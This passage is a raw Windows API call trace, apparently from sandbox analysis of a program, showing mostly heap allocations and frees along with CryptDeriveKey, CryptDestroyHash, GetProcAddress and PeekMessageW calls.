lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x2e50c20, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0185.919] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69a28 [0185.919] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e28 [0185.920] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d58 [0185.920] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54eb8 [0185.920] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d38 [0185.920] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0185.920] CryptDeriveKey (in: hProv=0xa5f958, Algid=0x6601, hBaseData=0xa874d0, dwFlags=0x1, phKey=0x8cef48 | out: phKey=0x8cef48*=0xa87310) returned 1 [0185.920] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0185.920] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69988 [0185.920] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0185.920] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b90 [0185.920] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c20 [0185.920] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c38 [0185.920] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54db8 [0185.920] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c38 | out: hHeap=0x970000) returned 1 [0185.920] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0185.920] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c20 | out: hHeap=0x970000) returned 1 [0185.920] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b48 [0185.920] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c20 [0185.920] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c50 [0185.920] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54eb8 [0185.920] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c50 | out: hHeap=0x970000) returned 1 [0185.920] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0185.921] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c20 | out: hHeap=0x970000) returned 1 [0185.921] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c38 [0185.921] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c20 [0185.921] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c50 [0185.921] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0185.921] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c50 | out: hHeap=0x970000) returned 1 [0185.921] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0185.921] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c20 | out: hHeap=0x970000) returned 1 [0185.921] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c20 [0185.921] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c50 [0185.921] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d10 [0185.921] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e28 [0185.921] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d10 | out: hHeap=0x970000) returned 1 [0185.921] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0185.921] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c50 | out: hHeap=0x970000) returned 1 [0185.921] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c50 [0185.921] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f50 [0185.921] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50da0 [0185.921] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d88 [0185.921] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50da0 | out: hHeap=0x970000) returned 1 [0185.921] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0185.921] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f50 | out: hHeap=0x970000) returned 1 [0185.921] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d10 [0185.922] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ea8 [0185.922] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d70 [0185.922] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d38 [0185.922] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d70 | out: hHeap=0x970000) returned 1 [0185.922] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0185.922] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ea8 | out: hHeap=0x970000) returned 1 [0185.922] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0185.922] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0185.922] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0185.922] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0185.922] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0185.922] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54260 | out: hHeap=0x970000) returned 1 [0185.922] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c08 | out: hHeap=0x970000) returned 1 [0185.922] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0185.922] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b00 | out: hHeap=0x970000) returned 1 [0185.922] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b78 | out: hHeap=0x970000) returned 1 [0185.922] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c80 | out: hHeap=0x970000) returned 1 [0185.922] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ab8 | out: hHeap=0x970000) returned 1 [0185.922] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50aa0 | out: hHeap=0x970000) returned 1 [0185.922] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ad0 | out: hHeap=0x970000) returned 1 [0185.922] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509c8 | out: hHeap=0x970000) returned 1 [0185.922] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c98 | out: hHeap=0x970000) returned 1 [0185.922] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cb0 | out: hHeap=0x970000) returned 1 [0185.923] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b18 | out: hHeap=0x970000) returned 1 [0185.923] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509e0 | out: hHeap=0x970000) returned 1 [0185.923] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a10 | out: hHeap=0x970000) returned 1 [0185.923] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509f8 | out: hHeap=0x970000) returned 1 [0185.923] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a28 | out: hHeap=0x970000) returned 1 [0185.923] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a40 | out: hHeap=0x970000) returned 1 [0185.923] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b30 | out: hHeap=0x970000) returned 1 [0185.923] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bd8 | out: hHeap=0x970000) returned 1 [0185.923] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a58 | out: hHeap=0x970000) returned 1 [0185.923] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bf0 | out: hHeap=0x970000) returned 1 [0185.923] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a70 | out: hHeap=0x970000) returned 1 [0185.923] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0185.923] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0185.923] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b60 | out: hHeap=0x970000) returned 1 [0185.923] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a88 | out: hHeap=0x970000) returned 1 [0185.923] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ae8 | out: hHeap=0x970000) returned 1 [0185.923] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0185.923] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977c68 | out: hHeap=0x970000) returned 1 [0185.923] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a08 | out: hHeap=0x970000) returned 1 [0185.923] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ba8 | out: hHeap=0x970000) returned 1 [0185.923] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c68 | out: hHeap=0x970000) returned 1 [0185.923] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bc0 | out: hHeap=0x970000) returned 1 [0185.923] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699e8 | out: hHeap=0x970000) returned 1 [0185.923] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0185.924] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e558d8 | out: hHeap=0x970000) returned 1 [0185.924] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e558d8 [0185.924] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978490 | out: hHeap=0x970000) returned 1 [0185.924] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0185.924] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e28 [0185.924] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e98 [0185.924] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54df8 [0185.924] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b48 [0185.924] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dd8 [0185.924] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0185.924] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0185.924] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b48 | out: hHeap=0x970000) returned 1 [0185.924] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0185.924] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0185.924] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a08 [0185.924] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0185.924] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a08 | out: hHeap=0x970000) returned 1 [0185.924] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0185.924] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e98 [0185.924] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0185.924] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507e8 | out: hHeap=0x970000) returned 1 [0185.924] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0185.924] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50758 | out: hHeap=0x970000) returned 1 [0185.925] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0185.925] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e28 [0185.925] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ea8 [0185.925] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0185.925] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0185.925] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509b0 | out: hHeap=0x970000) returned 1 [0185.925] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0185.925] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50878 | out: hHeap=0x970000) returned 1 [0185.925] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0185.925] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d68 [0185.925] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0185.925] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77808 | out: hHeap=0x970000) returned 1 [0185.925] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0185.925] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d88 [0185.925] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54de8 [0185.925] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a48 [0185.925] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a48 | out: hHeap=0x970000) returned 1 [0185.925] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0185.925] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0185.925] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50710 [0185.925] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50758 [0185.925] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e508c0 [0185.926] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50878 [0185.926] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509b0 [0185.926] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50770 [0185.926] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e543c8 [0185.926] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50710 | out: hHeap=0x970000) returned 1 [0185.926] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50710 [0185.926] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50890 [0185.926] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50830 [0185.926] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507e8 [0185.926] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50938 [0185.926] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0185.926] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e543c8 | out: hHeap=0x970000) returned 1 [0185.926] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50788 [0185.926] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508a8 [0185.926] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50980 [0185.926] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e508d8 [0185.926] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50998 [0185.926] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50cb0 [0185.926] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50b78 [0185.926] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ba8 [0185.926] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50bc0 [0185.927] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50ad0 [0185.927] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b00 [0185.927] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b18 [0185.927] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e78 [0185.927] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e801e8 [0185.927] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d98 [0185.927] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0185.927] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e801e8 | out: hHeap=0x970000) returned 1 [0185.927] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0185.927] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50a28 [0185.927] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b28 [0185.927] PeekMessageW (in: lpMsg=0x8cef40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef40) returned 0 [0185.927] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54eb8 [0185.927] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e98 [0185.927] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0185.927] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0185.927] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0185.927] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a28 | out: hHeap=0x970000) returned 1 [0185.927] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0185.927] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c68 [0185.927] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ea8 [0185.928] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c08 [0185.928] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0185.928] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a40 [0185.928] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0185.928] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ae8 [0185.928] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0185.928] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50aa0 [0185.928] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d28 [0185.928] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c80 [0185.928] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0185.928] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e543c8 [0185.928] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b00 | out: hHeap=0x970000) returned 1 [0185.928] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c98 [0185.928] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0185.928] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0185.928] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0185.928] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509c8 [0185.928] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0185.928] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509e0 [0185.929] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54eb8 [0185.929] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d28 [0185.929] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509f8 [0185.929] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509e0 | out: hHeap=0x970000) returned 1 [0185.929] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0185.929] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509f8 | out: hHeap=0x970000) returned 1 [0185.929] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0185.929] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509e0 [0185.929] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e68 [0185.929] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509f8 [0185.929] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d88 [0185.929] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54da8 [0185.929] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a10 [0185.929] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509f8 | out: hHeap=0x970000) returned 1 [0185.929] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0185.929] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a10 | out: hHeap=0x970000) returned 1 [0185.929] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0185.929] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509f8 [0185.929] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d68 [0185.929] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0185.929] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x11) returned 0x2e698c8 [0185.929] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x2e698c8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0185.930] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509f8 | out: hHeap=0x970000) returned 1 [0185.930] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54530 [0185.930] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e698c8 | out: hHeap=0x970000) returned 1 [0185.930] GetProcAddress (hModule=0x756e0000, lpProcName="CryptDestroyHash") returned 0x756ff0e0 [0185.930] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54530 | out: hHeap=0x970000) returned 1 [0185.930] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0185.930] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a88 [0185.930] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54db8 [0185.930] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0185.930] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a88 | out: hHeap=0x970000) returned 1 [0185.930] CryptDestroyHash (hHash=0xa874d0) returned 1 [0185.930] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0185.930] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e28 [0185.930] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e98 [0185.930] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509f8 [0185.931] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ab8 [0185.931] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a70 [0185.931] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e38 [0185.931] HeapFree (in: hHeap=0x970000, 